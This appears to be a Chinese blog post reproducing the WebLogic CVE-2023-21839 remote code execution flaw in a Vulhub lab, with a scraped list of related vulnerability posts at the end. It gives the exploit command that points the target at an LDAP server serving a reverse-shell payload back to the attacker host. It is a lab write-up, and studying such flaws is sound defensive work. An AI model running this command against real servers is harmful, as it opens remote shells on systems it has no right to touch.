一、漏洞简介

1. 产品简介

WebLogic是Oracle公司研发的用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,在全球范围内被广泛使用。

2. 漏洞简介

Oracle发布安全公告,修复了一个存在于WebLogic Core中的远程代码执行漏洞(CVE-2023-21839),可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogic Server,成功利用该漏洞可能导致未授权访问和敏感信息泄露。

3. 危害等级

高危

4. 影响范围

Oracle Weblogic Server 12.2.1.3.0

Oracle Weblogic Server 12.2.1.4.0

Oracle Weblogic Server 14.1.1.0.0

二、复现环境

靶机(搭建的Vulhub漏洞测试靶场):192.168.15.15
攻击机(kali):192.168.15.131
Vulhub漏洞测试靶场的搭建可参考:Vulhub漏洞测试靶场搭建

三、复现过程

1. 启动漏洞环境

使用Vulhub启动漏洞环境

2. 验证漏洞环境

访问链接:http://192.168.15.15:7001/console/login/LoginForm.jsp 即可访问到后台管理登录界面,出现以下界面证明环境搭建成功。

3. 漏洞复现

用到的两个工具:JNDIExploit-1.2-SNAPSHOT.jar、CVE-2023-21839

第一步:使用工具JNDIExploit-1.2-SNAPSHOT.jar在kali上设置监听:

第二步:打开kali监听端口

第三步:使用CVE-2023-21839工具来进行攻击测试(将工具上传至kali进行编译,然后再执行)

cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 192.168.15.15 -port 7001 -ldap ldap://192.168.15.131:1389/Basic/ReverseShell/192.168.15.131/6666

第一次执行报错 提示 Exception in thread "LDAPListener client connection reader for connection from 的错误。解决方法:需要去下载对应服务器版本的java的版本。

安装jdk1.8.0.202后再次执行(不知道如何安装java的可以参考:java安装步骤)

第四步:成功反弹shell


最后一步:复现之后别忘记及时关闭漏洞环境

【漏洞复现】Weblogic CVE-2023-21839相关推荐

  1. 漏洞复现—Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password

    Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password 基础知识 漏洞原理 涉及版本 ...

  2. 漏洞复现 - - - Weblogic漏洞(一)

    目录 一,Weblogic简介 二,Weblogic漏洞环境搭建 三,Weblogic弱口令 四,CVE-2014-4210 漏洞环境 漏洞危害 漏洞复现 进行内网存活探测 一,Weblogic简介 ...

  3. 远程桌面漏洞poc_【漏洞复现】CVE 2019-0708 漏洞利用

    0x00 前言 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统.此漏洞是预身份验证且无需用户交互,这就意味着这 ...

  4. Weblogic历史漏洞复现

    Weblogic WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发.集成.部署和管理大型分布式 ...

  5. weblogic漏洞复现

    weblogic 漏洞复现 Weblogic ssrf https://www.hetianlab.com/expc.do?ec=ECID9d6c0ca797abec20170210143122000 ...

  6. [Vulhub] Weblogic 漏洞复现

    文章目录 Weblogic 常规渗透测试环境 0x00 测试环境 0x01 弱口令 0x02 任意文件读取漏洞的利用 0x03 后台上传webshell Weblogic WLS Core Compo ...

  7. java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...

    学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...

  8. weblogic中ssrf漏洞修复_Weblogic-SSRF漏洞复现

    0x00简介 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发.集成.部署和管理大型分 ...

  9. weblogic漏洞复现(CVE-2020-2555)

    漏洞环境:fofa自己找,server=weblogic port=7001 一.漏洞简介 该反序列化的gadget存在与coherence包中.具体可以见分析 构造chain类似于common-co ...

  10. weblogic 漏洞复现

    cd vulhub/weblogic/CVE-2018-2894/ //进入对应得目录sudo service docker start //启动docker服务docker-compose up - ...

最新文章

  1. Linux 如何通过命令查看一个文件的某几行(中间几行或最后几行)
  2. Docker环境配置指南!
  3. Devexpress TreeList控件绑定显示父子节点对像
  4. 企业如何正确选择云ERP管理软件
  5. Sencha-概念-Events(事件)(官网文档翻译10)
  6. 【嵌入式】Libmodbus源码分析(三)-modbus相关函数分析
  7. [BizTalk]在高可用性环境下配置BizTalk的一些常见问题
  8. POJ-2533 Longest Ordered Subsequence
  9. 访问 JSON 对象的值
  10. SQL Server Denali:SSDT新功能解读
  11. 自动驾驶——2D高精度地图的生成
  12. 【软考】2020年全国计算机技术与软件专业技术资格考试,网络工程师(中级),考纲
  13. 使用扩展欧几里得算法对逆元求解
  14. sql if语句实例
  15. 一次完整的http请求过程
  16. 全赔你们要1200亿!知网哭穷:我们一年净赚还不到2亿
  17. Linux进程管理(redhat 8.0)
  18. 分享老齐【学方法】宽信用周期对股市的影响!
  19. ARM裸机篇(三)——i.MX6ULL第一个裸机程序
  20. Require statement not part of import statement. eslint@typescript-eslint/no-var-requires报错修改

热门文章

  1. datadashboard下载_Data Dashboard for LabVIEW app下载
  2. CentOS4.4下架设简单的邮件服务器笔记
  3. Java nio libev,libev实现echo服务器
  4. 物联网——Al二哈人脸识别
  5. 2019最新最全动脑学院数据结构与算法系列java完整版
  6. unity开发微信小游戏-CDN上的资源下载失败
  7. 高级人像调色效果Lr预设
  8. 吴文俊: 中国古代数学对世界文化的伟大贡献
  9. linux+gpfs配置文件,centos7 安装gpfs 4.1.1.3
  10. SqlServer2005 四舍六入 四舍六入五成双 函数